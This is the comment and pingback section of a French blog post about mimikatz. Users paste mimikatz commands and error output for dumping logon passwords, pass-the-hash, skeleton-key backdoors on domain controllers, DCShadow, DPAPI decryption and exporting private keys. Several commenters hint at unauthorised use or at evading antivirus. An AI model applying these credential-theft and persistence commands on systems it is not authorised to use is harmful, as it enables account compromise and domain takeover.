  196. Ping : Owning Networks and Evading Incident Response with PowerShell » Active Directory Security

  197. Ping : MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege » Active Directory Security

  198. Ping : The Evolution of Protected Processes Part 1: Pass-the-Hash Mitigations in Windows 8.1 » Active Directory Security

  199. Ping : Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK) » Active Directory Security

  200. Ping : День взлома публичных терминалов. | Бредоблог

  201. Ping : 抓取windows密码的神器mimikatz | linux爱好者

  202. Ping : 12 Days of HaXmas: MS14-068, now in Metasploit! | IT Security News

  203. La commande : sekurlsa::longonpasswords a comme résultat: ERROR mimikatz_doLocal ; « logonPasswords » command of « sekurlsa » module not found!

  204. Ping : Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest » Active Directory Security

  205. When i attempt to load the CNG service on Windows 8.1, i get a nice error.

    ERROR kull_m_patch_genericProcessOrServiceFromBuild ; kull_m_patch (0x00000000)

    I’ve got no AV running, or anything. Any ideas?

      • Running into the same error in Server 2012 (not R2). I have local admin rights, disabled UAC, and disabled the UAC registry key, and have restarted a few times. Any help would be appreciated. Thank you!

        mimikatz # crypto::cng
        ERROR kull_m_patch_genericProcessOrServiceFromBuild ; kull_m_patch (0x00000000)

      • Looks like the patch didn’t work then. I’m still unable to export my certificate’s private keys. Anything else I can try?

  206. Ping : Windows密码抓取神器mimikatz2.0发布

  207. Ping : Windows 10 ancora più sicuro: micro macchine virtuali contro i rootkit | NUTesla | The Informant

  208. It seems that to debug the lsass you need to be a local admin on a machine. But can this tool be used by a person on a remote computer on which that person is not a admin and still get the credentials by any means? Let’s say this is MS domain ;)

  209. Ping : [Из песочницы] Восстанавливаем локальные и доменные пароли из hiberfil.sys | Malanris's site

  210. Ping : Локальные и доменные пароли из hiberfil.sys | Азбука АйТи

  211. Ping : Mimikatz Aracı İle RAM Üzerinden Parolanın Açık Halinin Elde Edilmesi | SİBER GÜVENLİK PORTALİ

  212. Hello blog readers.
    i was wondering of there are any traces of passing the ticket?
    i.e. is there a special windows event or some way to find that being a domain admin that is concerned about his domain security?

  213. Ping : Windows系统密码查看神器-mimikatz - Sueri's Blog - 狸博窝 - 关于遇见 关于起航 - Sueri_锐的个人博客

  214. Ping : mimikatz – shows windows passwords | blog.pemato.de

  215. Ping : Cobalt Strike 2.4 – A Pittance for Post-Exploitation | Strategic Cyber LLC

  216. Ping : Cobalt Strike 2.4 – A Pittance for Post-Exploitation - ime blog

  217. Ping : Exporting unexportable certificates - Dragos MadarasanDragos Madarasan

  218. Ping : Yep! Another backdoor in Active Directory :: Mimikatz Golden Ticket | RISC expert

  219. Ping : Export non-exportable certificate | dotMS

  220. Ping : How to Pass-the-Hash with Mimikatz | Strategic Cyber LLC

  221. Ping : Fortifying Networks – How to Pass-the-Hash with Mimikatz

  222. Ping : Useful Hacking: How to Steal Kerberos Tickets - infocenter blog

  223. Ping : Office 365にADFSが必要な理由

  224. Ping : Mimikatz | Pentest Me. Newbie.

  225. Ping : Hello world ! Get ready for some fun, tips and tricks | panetrationtestingtips

  226. Ping : Windows kerberos ticket theft and exploitation on other platforms | mikkolehtisalo

  227. Ping : Blackhat USA 2015 | CyberSmashup

  228. Ping : Crack Windows 7 Password - DIARY INC

  229. Ping : Hash传递攻击Windows2012远程桌面 - BlackCyber Team

  230. Ping : Hash传递攻击Windows2012远程桌面 – cnccxv技术团队

  231. Ping : Hash传递攻击Windows2012远程桌面 - 内网渗透 - 秀尔实验室

  232. Ping : Windows 10 Security: Virtual Secure Mode | DevAdmin Blog

  233. Ping : Directory Services Internals » Dumping ntds.dit files using PowerShell

  234. Ping : Mimikatz – Multi-tool to play with Windows security | SecTechno

  235. Ping : Crack Windows 7 Password | NewsWebb

  236. Ping : Directory Services Internals » Vykrádanie hesiel z Active Directory na diaľku

  237. Ping : linux 802.1x on a windows wired network – segmentfault

  238. Ping : CARA MENGETAHUI PASSWORD LOGIN ADMINISTRATOR PADA SISTEM OPERASI WINDOWS | NEWBIE 26 INSIDE

  239. Ping : Test : Microsoft Advanced Threat Analytics | JdlS

  240. Ping : 提取系统明文密码 工具

  241. Ping : Mimikatz ile Bellekten Salt Şifre Elde Etme - Anıl Mamak

  242. Hi,there
    i used misc::skeleton to use skeleton key on dc
    but i want change the password « mimikatz » to my own password
    how to change it ?

  243. Ping : Mimikatz 非官方指南和命令参考_Part1-IT大道

  244. Ping : Mimikatz 非官方指南和命令参考_Part1 | z7y Blog

  245. Ping : Mimikatz 非官方指南和命令参考_Part1 | 邪恶十六进制

  246. Ping : 问君几多愁 » msf中使用MIMIKATZ

  247. Ping : Identidade é o Novo Perímetro | Yuri Diogenes

  248. Ping : Awesome Penetration Testing – A Lista de quem deseja aprender a arte do pentest - Peguei do

  249. Hey, im need help with windows 10, im need credentials to hack password, what im need to do to hack the password? answer please, thanks

    • There are multiple aproaches, all of them having one thing in common. Since I don’t know you and your intentions (who knows, maybe it’s not your device, maybe it is. I can’t tell.) I’ll only give basic advice and a lead, the rest is up to you.
      Keep in mind that it has been a year or two since the last time I helped someone regaining acces. So there are some variables i’m not up-to-date with.

      First you should do some research on how windows works, only the basic things are required: How do the user accounts work, are they stored locally? (most likely, but I recall w10 being able to use your user account on multiple devices, I dont know w10’s behaviour when you have no internet connection and use the credentials you use for other devices too (ms account or something? ) > I expect that the user accounts and passwords are stored locally in both cases. > ask and find out how win manages passwords. (if correct, it should be possible to find out services etc used for this purpose.)

      Now: first go into a search engine you find handy and effective. Research the above mentioned things.
      Write down some keywords and the names of services / programs you suspect of being involved.

      second: Be creative > imagine a door with a lock thats externally mounted, screws exposed.. You have with you: A set of internals including a new key and a ratchet with 2 attatchments, one thats fitted is torx and one that you found out to be usable on the screws that hold the lock in place.
      >> What would you do to gain acces?

      Swap something over using a commonly availlable piece of gear so you can replace or remove that what keeps you from getting in.

      Good luck.

      ps. I usually can’t stand people who ask prior to doing research…
      You want something and don’t know how? Start learning then. All you need is availlable on the internet to read. If you don’t know why a certain method works, you don’t know what you are doing. You don’t know what you are doing, you will ‘hurt’ yourself eventually.

      Also, keep things nice and don’t use the underlying method in a way that gets you in trouble. Be whise, its your own responsibillity.

  250. What about when you use email to login like an outlook or other microsoft account? I tryed this tool but that account does not show.

  251. incredible , also he obtained the password of other equipment that had connected to my local network
    you are a god of programming !!!

  252. Ping : mimikatz手册1【窃】 | hia-hia-hia

  253. Ping : mimikatz v2.1 alpha 20160506 (oe.eo) edition; A little tool to play with Windows security. – sec.uno

    • Bonjour, je suis du type totalement ignare, mais c’est s’il n’y a aucun .exe dans les fichiers que l’on télécharge ?
      On est que deux à se poser la question, mais je trouve qu’elle mérite d’être posée…
      Au fait bravo, c’est enfin un français qui code des programmes qui servent vraiment ^^. Bonne continuation

  254. Ping : Useful Hacking with Paula Januszkiewicz Part 2 - Center for Professional Development @ ITT TechCenter for Professional Development @ ITT Tech

  255. Ping : Ferramentas para testes de invasão disponíveis no GitHub » Intrometendo

  256. Ping : Are you W10 experienced ? – Geekeries à MlM

  257. Thanks for the tool used it recently for windows 7 worked perfectly, but it doesn’t seem to work anymore on windows 10
    it says (null) instead

  258. Ping : Bookmark this | Doxsec

  259. Ping : Mimikatz v2.1 alpha 20160523 – A little tool to play with Windows security. – sec.uno

  260. bonjour, mon nom est Jose Luis, il est bizarre parce que je suis mexicain et utiliser Google pour traduire le message, mimikatz servis dans win10?

  261. Ping : 一套渗透测试资源合集 - 体验盒子

  262. Ping : Decrypting SSL traffic with Wireshark | Wireshark.no

  263. Ping : Mimikatz小实验:黄金票据+dcsync | 邪恶十六进制

  264. Ping : 15 Second Password Hack, Mr Robot Style | Technolust since 2005

  265. Ping : Mimikatz小实验:黄金票据+dcsync |

  266. Ping : Mimikatz小实验:黄金票据+dcsync | FlyのBlog

  267. Ping : CARA MENGETAHUI PASSWORD LOGIN ADMINISTRATOR PADA SISTEM OPERASI WINDOWS - NEWBIE 26 INSIDE

  268. Ping : How to audit bad AD passwords ? | Jacques DALBERA's IT world

  269. Ping : window权限提升基础知识 - GoldFire's Blog

  270. Ping : A Collection of Awesome Penetration Testing Resources – Fzuckerman©

  271. Hi,

    I accidentaly deleted one certificate from my certificate store. I’ve private key, which stored in folder AppData\Roaming\Microsoft\Crypto\RSA\. I’ve exported « public » part of certificate with .cer ending.

    If I import certificate into mmc, private key is not found. Do you think, that is possible to « extract » private key just from file, which is stored in AppData\Roaming\Microsoft\Crypto\RSA\? Thank you for answer.

  272. Ping : Windows域横向渗透 – 技术宅 BLOG

  273. Ping : 密码抓取神器mimikatz2.0发布 – TIGER BLOG

  274. Sir my av (avast) is detecting it any deleting it immediately and I want to run while av is still there in system(windows 7)
    Pls help its my little project

    Thank u for tool works fine without av

  275. Ping : To Export the Unexportable Key - The End of the Tunnel

  276. Hello,
    I wonder how many years of experience with c++ do you have ? I would like to know
    Thank you,
    Wiliam

  277. Ping : Decrypting IIS Passwords to Break Out of the DMZ: Part 2

  278. Ping : Mimikatz 非官方指南和命令参考_1-微慑信息网-VulSee.com

  279. Ping : 看我如何从一个APK到最终拿下域管理权限? - FreeBuf.COM | 关注黑客与极客

  280. Ping : 看我如何从一个APK到最终拿下域管理权限? – 即刻安全

  281. Ping : Hacking Windows with Password Grabbing – Doxsec

  282. Ping : Mimipenguin Mimikatz for Linux | Hacking Portal Research Lab

  283. Hello,

    first: Thanks for sharing!
    But I’ve a problem. If I use the command « sekurlsa::logonpasswords » i get the Username etc.. but no password.
    « tspk: » is empty.
    « wdigest » Passwort shows me: « (null) »

    What did I wrong? Runned the exe as admin and no Virus-Programms or that^^

  284. Ping : Mimikatz 非官方指南和命令参考_Part1 – L-pkav@安全与编程

  285. Ping : Python Backdoor – Persistence – Technic Dynamic

  286. Ping : 强制查看开机密码的办法

  287. Ping : Mimikatz小实验:黄金票据+dcsync – FreeBuf.COM | 关注黑客与极客 – 雨后sunshine

  288. Ping : Restricted Admin Mode For RDP ( Sınırlandırılmış Yönetici Modu ) – My Blog

  289. Ping : Восстанавливаем локальные и доменные пароли из hiberfil.sys — PERSONAL BLOG

  290. please add a tool for removable drive (usb and others ) in misc and override administrator security :-)
    then nice work for the tools

  291. Ping : Hash传递攻击Windows2012远程桌面 | | 杂术馆

  292. Awesome job! it helped me a lot through a remote session in a machine thet needed a restart & the owner did’nt gave me the admin password, so i was in the machine in an administrator session, i’ve runed the proper commands & worked like a charm.

    Now i’m tryng to experiment through non admin sessions, in my own machine, & a can’t figure it out. This is the console result:

    C:\Windows\System32>cd /MIMIKATZ/mimikatz_trunk/x64

    C:\MIMIKATZ\mimikatz_trunk\x64>mimikatz.exe

    .#####. mimikatz 2.1.1 (x64) built on Jul 20 2017 01:37:08
    .## ^ ##. « A La Vie, A L’Amour »
    ## / \ ## /* * *
    ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
    ‘## v ##’ http://blog.gentilkiwi.com/mimikatz (oe.eo)
    ‘#####’ with 21 modules * * */

    mimikatz # privilege::debug
    ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

    mimikatz #

    As you see, running cmd as admin, in a guest account, results in this error. What i’m doing wrong?

    Thx a lot in advance.

  293. Ping : Lista com ferramentas de segurança e pentest – Gianfratti.com

  294. Ping : Hack Like Mr. Robot, Own a Computer in 14 Seconds — The Hack Today

  295. Ping : 2012 in Review and a Look Forward to 2013 | DirectDefense

  296. Ping : Penetration Testing Methodologies, Tools and Technique – Technology Random Blog

  297. Ping : Mimikatz – Active Directory Security | CodeFlex

  298. Ping : 利用Mimikats提取虚拟机内存中的密码 | E644

  299. Ping : 看我如何从一个APK到最终拿下域管理权限?Govcm Network security | Govcm Network security

  300. Ping : BadRabbit es el ransomware que ataca al estilo de WannaCry y Not-Petya

  301. Ping : Mimikatz 非官方指南和命令参考_Part1 – WooyunDropsImage

  302. Ping : APT28 – WooyunDropsImage

  303. HELP, When I put « Sekurlsa:: logonpasswords » I do not see the password anywhere. In the site where is « Password » says «  »

  304. Ping : Blog BSSI

    • emmmmmmmm…………

      somehow this tool was misused by somebody to launch the BadRabbit(NotPetya) Ransomware attack……..

      so this tool was also blacklisted by some antivirus company………….

  305. Ping : Restricted Admin Mode For RDP (Sınırlandırılmış Yönetici Modu) - Ozan ÖZATAY

  306. Ping : Attenzione alle chiavette USB - Il Blog di Michele Pinassi

  307. Ping : Pentest Guide – Wiki Sec

  308. Ping : Lo Zen e l'Arte di scegliere una Password sicura - Il Blog di Michele Pinassi

  309. Salut, je ne sais pas ou trouvé mimikatz.exe dans le zip téléchargé ou comment le faire fonctionner ? Désolé pas très fort en informatique.

    • Salut,
      au debut j’ai eu le même problème. J’ai téléchargé le zip comme décrit, mais je ne pouvais pas trouver mimikatz.exe. Plus tard, j’ai découvert que mon programme anti-virus a secrètement supprimé mimikatz.exe, alors j’ai désactivé le programme anti-virus et voilà: mimikatz.exe
      Ma réponse est un peu en retard, mais peut-être il y a quelqu’un qui cherche encore une solution ;)
      Excusez mon francais, ce sont plusieurs années depuis ma dernière lecon de francais ;)

  310. Hello,
    I couldn’t able to export certificates with non-exportable private keys in WINDOWS XP.

    Details:
    .#####. mimikatz 2.1.1 (x86) built on Dec 20 2017 00:17:44
    .## ^ ##. « A La Vie, A L’Amour » – (oe.eo)
    ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
    ## \ / ## > http://blog.gentilkiwi.com/mimikatz
    ‘## v ##’ Vincent LE TOUX ( vincent.letoux@gmail.com )
    ‘#####’ > http://pingcastle.com / http://mysmartlogon.com ***/

    mimikatz # privilege::debug
    Privilege ’20’ OK

    mimikatz # crypto::capi
    Local CryptoAPI patched

    mimikatz # crypto::keys /export
    * Store : ‘user’
    * Provider : ‘MS_ENHANCED_PROV’ (‘Microsoft Enhanced Cryptographic Provide
    r v1.0’)
    * Provider type : ‘PROV_RSA_FULL’ (1)
    * CNG Provider : ‘Microsoft Software Key Storage Provider’

    CryptoAPI keys :

    CNG keys :

    mimikatz #

    Can you please help? Should it work in XP?

    BR,
    Mahir

  311. Ping : Awesome : Hacking – iSpHiNS Blog

  312. Ping : A Complete Penetration Testing & Hacking Tools List for Hackers – Pak Exploit

  313. Ping : Website Security and the Different Hacking Tools – Rajveer Shinghania

  314. Ping : 记一次Mimikatz之旅-天府数据港官方信息博客

  315. Ping : How to extract hashes and crack Windows Passwords - Projet Serviet

  316. Hi,

    I have a laptop with access to both the local administrator account and a domain user account (offline/cached credentials).

    The domain user can connect to a corporate VPN which uses a certificate. I want to get the certificate which is non exportable.

    When running MimiKatz as the Local admin, it does not pull off the private certificate for the domain user account (maybe because it is not the current user?).

    I am not 100% sure its the private certificate I want yet as the VPN profile config refers to a Machine Cert.

    Any Tips?

  317. Hello,

    I’ve tried to decrypt some browser passwords from my old windows 7 laptop. With the help of mimikatz I had already success with some chrome passwords, but I don’t get the clue how to crack Internet Explorer. I took the blob structure from the registry (HKCU\Software\Microsoft/Internet Explorer/IntelliForms/Storage2) containing a Facebook password and typed the following in mimikatz:

    dpapi::masterkey /in:C:\…\Protect\\ /password:

    This is working fine so far, so the decrypted masterkey is stored in mimikatz’ cache. But as I try to decrypt the blob like this:

    dpapi::blob /in:C:\path\to\file\with\value\from\registry /entropy:c0400e6fabb4c395ff857d0614e66508ba8ba737c5 /unprotect

    …I get two errors:

    ERROR kull_m_dpapi_unprotect_blob ; CryptDecrypt (0x80090005)
    ERROR kuhl_m_dpapi_unprotect_raw_or_blob ; CryptUnprotectData (0x0000000d)

    What did I miss? Thanks in advance!

    John

  318. Ping : AD – How to audit weak passwords ? | Jacques DALBERA's IT world

  319. Ping : Blog BSSI

  320. Ping : Hacking tools – HackTymherLeng

  321. Ping : Lo Zen e l’Arte di scegliere una Password sicura | Il Blog di Michele Pinassi

  322. Ping : SEGURIDAD INFORMATICA ACTUAL

  323. Ping : Lista de Herramientas para Penetration Testing y Hacking | Div Security

  324. Ping : Reflective DLL Injection with PowerShell – Top Security News

  325. Ping : Mimikatz – Somemamgel's Blog

  326. Ping : Mimikatz 非官方指南和命令参考_Part1 | MottoIN

  327. Ping : Recopilación de herramientas de hacking - Div Security

  328. Ping : 使用mimikatz获取Win7明文登录密码 - 若水斋

  329. Ping : 针对黑客和安全专业人员的完整渗透测试和黑客工具列表 - 极客谷-站在巨人的肩膀上-在学习中进步,在进步中学习

  330. Ping : A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals

  331. Ping : windows系统密码查看神器-mimikatz - 兼容并蓄 - 记 - 零零星星 - mimikatz - windows密码 - 密码查看 - HHTjim'S 部落格

  332. Ping : Penetration Testing Resources - Dexter CyberLab | Dexter CyberLab

  333. Ping : Latest Hacking Tools List for Security Professionals and Hackers

  334. Ping : Локальные и доменные пароли из hiberfil.sys — azbukait.ru

  335. Ping : What is Mimikatz? And how to defend against this password stealing tool – Menedar.com

  336. Ping : What is Mimikatz? And how this password-stealing tool works - TechnologyNEWS.win

  337. Ping : What is Mimikatz? And how this password-stealing tool works – Tech News

  338. Ping : What's Mimikatz? And the way this password-stealing device works | Doers Nest

  339. Ping : ¿Cómo puedo iniciar sesión como otro usuario en Windows (Vista) sin saber o cambiar su contraseña?

  340. Ping : 针对黑客和安全专业人员的完整渗透测试和黑客工具列表 - 极客谷

  341. Ping : Complete Penetration Testing & Hacking Tools List - Cybarrior

  342. will it also bypass the window 8.1 and above security feature where mimikatz will not have privilege to attach to it.??

  343. Hello:
    Excellent work.
    I have 2 questions and sorry about my little knowledge.

    First, Using command: !+
    will elevate privileges to run as a driver.
    ?This will be set permanent in Registry?
    Because after running this command 2 or more times gives Error:
    ERROR kull_m_service_install ; StartService (0x00000003)
    ,that seeme to be due to the fact that is already running/already registered.

    Second Q: ,After using command :
    !processprotect /process:lsass.exe /remove
    ,this unProtection will be permanent or just until next computer Restart.?

  344. Ping : Mimikatz 非官方指南和命令参考_Part1 | CN-SEC 中文网

  345. Ping : APT28 | CN-SEC 中文网

  346. Sir.
    mimikatz # dpapi::masterkey
    Whenever i try to decrypt master key your program mimikatz crashes.

    Problem signature:
    Problem Event Name: APPCRASH
    Application Name: mimikatz.exe
    Application Version: 2.2.0.0
    Application Timestamp: 5cd8adba
    Fault Module Name: msvcrt.dll
    Fault Module Version: 7.0.9600.17415
    Fault Module Timestamp: 545055fe
    Exception Code: c0000005
    Exception Offset: 0000000000001913
    OS Version: 6.3.9600.2.0.0.256.48
    Locale ID: 1033
    Additional Information 1: c227
    Additional Information 2: c227427f4899e992de408789b23a521d
    Additional Information 3: 99a6
    Additional Information 4: 99a62dd7ee60746370fb30a127a32f2f

  347. Ping : Best Hacking Tools List for Hackers & Security Professionals in 2019

  348. .#####. mimikatz 2.2.0 (x64) #18362 Aug 14 2019 01:31:47
    .## ^ ##. « A La Vie, A L’Amour » – (oe.eo)
    ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
    ## \ / ## > http://blog.gentilkiwi.com/mimikatz
    ‘## v ##’ Vincent LE TOUX ( vincent.letoux@gmail.com )
    ‘#####’ > http://pingcastle.com / http://mysmartlogon.com ***/

    mimikatz # privilege::debug
    Privilege ’20’ OK

    mimikatz # sekurlsa::logonpasswords
    ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations

    It worked a couple of times before. Now it shows this error.

    Thanks in advance

  349. Ping : SecurityInside en la RootedCON 2016 - SecurityInside.info

  350. Im getting the following error on a Win7 box. It looks like there is no AV/protection as Im even allowed to drop mimikatz on disk without even getting flagged. Any idea how is this error being triggered?
    Sorry, but I dont have any sysinfo-like output. It was a Win7 workstation with no evident protection. (yes, im system)

    Error: ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations

  351. Hi, I got a serious question here…
    Where does the name « mimikatz » come from? what’s the reason for that name?

    Thanks

  352. Ping : Security Specialists - All Hacking Tools - List for Penetration Testing - Hacking - Hackers Third Eye Kashmir

  353. Ping : windows权限提升基础知识 | CN-SEC 中文网

  354. Ping : Assume Breach – Sichere IT-Infrastruktur mit dem TEAL Security Assessment - TEAL Technology Consulting GmbH

  355. Ping : A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals – Wacken Security

  356. Ping : Lista completa de ferramentas de teste de penetração e hacking – Information Security

  357. Ping : Silver & Golden Tickets – TerabitWeb Blog

  358. Ping : 记一次实战入侵某动作片站(影视站)-黑客培训基地_黑客接单平台

  359. Ping : Mimikatz |

  360. Ping : Pass-the-Hash умер. Да здравствует долгоиграющий Pass-the-Hash — КИБЕРВОИН

  361. Ping : Hacker's Favorite Tool: Mimikatz - Adlice Software

  362. Hi,
    I try to list processes of a memory dump file. I did the following commands:
    mimikatz # sekurlsa::minidump memdump.mem
    Switch to MINIDUMP : ‘memdump.mem’

    mimikatz # process::list

    But it list processes of the running computer but not the ones in memdump.mem.

    What is the correct syntax to do it ?

    Thanks a lot
    Great tool BTW! :)
    Franck

  363. Ping : Lista com um arsenal de ferramentas para pentest

  364. Ping : A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals – Linux Mind

  365. Ping : A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals – Mehran Tajbakhsh

  366. Ping : The only Penetration testing resources you need - kalitut

  367. Ping : Wichtige Hacker Quellen und Links - conzu

  368. Ping : Hack Like Mr. Robot, Own a Computer in 14 Seconds - Dark Reading Hacking News website Peneration Testing

  369. Ping : A Complete Penetration Testing & Hacking Tools List | INSIGHT

  370. Ping : Mimikatz: Витягуємо паролі користувачів Windows з пам’яті у відкритому вигляді - Windows для системних адміністраторів

  371. Ping : How to export unexportable all certificates – fast and easy – Wiedza

  372. Hi,
    Thank you for this great tool and the continuous development.

    I’m trying to pass the hash on a windows 10 (10.0.19042) machine where kaspersky is installed and here is the output.

    mimikatz(powershell) # privilege::debug
    Privilege ’20’ OK
    mimikatz(powershell) # sekurlsa::pth /user:someUser /domain:test.com /ntlm:{hash value}
    user : someUser
    domain : test.com
    program : cmd.exe
    impers. : no
    NTLM : {hash value}
    | PID 19796
    | TID 16984
    ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations
    ERROR kuhl_m_sekurlsa_pth_luid ; memory handle is not KULL_M_MEMORY_TYPE_PROCESS

    Any idea what is going on ? I searched a lot for a resolution but found nothing useful. is it something related to LSASS protection ?!

  373. Ping : 100 Greatest Hacking Instruments for Safety Professionals in 2020-Cyberblowing - Cyberblowing

  374. Ping : A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals – Hacker Observer

  375. Doing a school assignement, they gave me Mimikatz as subject.
    Truly amazed by the whole story and evolution of this Tool.
    Your slide presentation from 2012 realy helped in understanding a bit
    about the workings of this legendary tool. Dispite my petit knowledge of
    programming and linux etc.
    Vive la France
    Salut,
    Wouter Mulder

  376. Ping : Hack Like Mr. Robot, Own a Computer in 14 Seconds – Premium Tech Services

  377. Hello,

    I am receiving the below error.

    mimikatz # sekurlsa::dpapi
    ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

    mimikatz # sekurlsa::logonpasswords
    ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

    Please suggest what mistake I am doing. I am trying to get masterkeys.

  378. Ping : 100 Greatest Hacking Instruments for Safety Professionals in 2020 – Jinsla News | Latest Cybersecurity

  379. Ping : Kerberos tickets: Comprehension and exploitation | kerberos attacks

  380. Ping : 100 Best Hacking Tools for Security Professionals in 2020 – Krypto Tech Lens

  381. Hi ! I have an error which I don’t understand when I launch misc::skeleton.
    I’m trying it on a Microsoft Windows Server 2019 (Version 10.0.17763 Build 17763) with Mimikatz 2.2.0 (arch x64) with a powershell run as administrator. ( I am DA )

    After doing a working privilige::debug, I tried to run misc::skeleton and got this error : ERROR kuhl_m_misc_skeleton ; kull_m_process_getVeryBasicModuleInformationsForName (0x00000000)

    I hope you will be able to help me :)

    NB : you can reply in french if you want to

  382. Ping : Réaliser une attaque brute-force RDP sur une machine Windows avec Kali - Akril.net

  383. mimikatz # privilege::debug
    Privilege ’20’ OK

    mimikatz # sekurlsa::logonpasswords
    ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations

    comment je regle ça??

    how do i fix that???

    wtf is going on

    bordel, keski ce passe

  384. Ping : Hack Like Mr. Robot, Own a Computer in 14 Seconds

  385. Ping : Worok: The Big Picture | CyberSecured 24x7

  386. Ping : It’s an older code but it checks out – Michael Waterman

  387. I am unable to run commands such as @getCredman and @getLogonPasswords. I get errors that the command is not found in the standard module. Are these part of the standard mimikatz distribution ?

    Thanks

  388. I have an error when I try to simulate the dc shadow attack in my virtual environment.

    The command mimikatz # !+ gives this error: ERROR kuhl_m_kernel_add_mimidrv ; kull_m_file_isFileExist (0x00000002)
    The command mimikatz # !processtoken gives this error: ERROR kull_m_kernel_ioctl ; CreateFile (0x00000002)
    The command lsadump::dcshadow /object:____________ /attribute:_________ /value:_______ gives this error: ERROR kuhl_m_lsadump_dcshadow ; ldap 0x31 (49)

    I don’t know where I am going wrong. I understand the theory but where exactly is the issue? I have been trying to figure this out for 3 days now.

    Please help. Thanks

  389. Ping : Mimikatz Aracı ile RAM Üzerinden Parolanın Açık Halinin... - Dünya haberleri SondakikaWorld'la parmaklarınızda!

  390. Ping : SACAR CONTRASEÑAS DE WINDOWS CON MIMIKATZ – RAID1 Consultoria Informatica

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.